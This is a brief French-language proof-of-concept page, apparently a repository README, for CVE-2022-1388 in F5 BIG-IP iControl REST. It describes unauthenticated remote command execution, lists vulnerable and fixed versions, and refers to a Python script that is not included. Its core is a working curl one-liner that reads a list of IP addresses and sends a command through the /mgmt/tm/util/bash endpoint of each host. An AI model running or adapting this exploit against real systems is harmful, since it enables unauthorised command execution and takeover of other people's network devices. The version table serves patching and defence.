
BIG-IP iControl REST vulnerability CVE-2022-1388 PoC

Cette vulnérabilité peut permettre à un attaquant non authentifié ayant un accès réseau au système BIG-IP via le port de gestion et/ou les adresses IP self d'exécuter des commandes système arbitraires, de créer ou supprimer des fichiers, ou de désactiver des services.
Vous pouvez utiliser la commande curl suivante pour vérifier la vulnérabilité F5 Big-IP ou utiliser le script Python fourni.
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
| Branche | Versions vulnérables | Correctifs introduits |
|---|---|---|
| 11.x | 11.6.1-11.6.5 | Aucun correctif |
| 12.x | 12.1.0-12.1.6 | Aucun correctif |
| 13.x | 13.1.0-13.1.4 | 13.1.5 |
| 14.x | 14.1.0-14.1.4 | 14.1.4.6 |
| 15.x | 15.1.0-15.1.5 | 15.1.5.1 |
| 16.x | 16.1.0-16.1.2 | 16.1.2.2 |
| 17.x | Aucune | 17.0.0 |
Pour plus d'informations sur l'atténuation, consultez les références.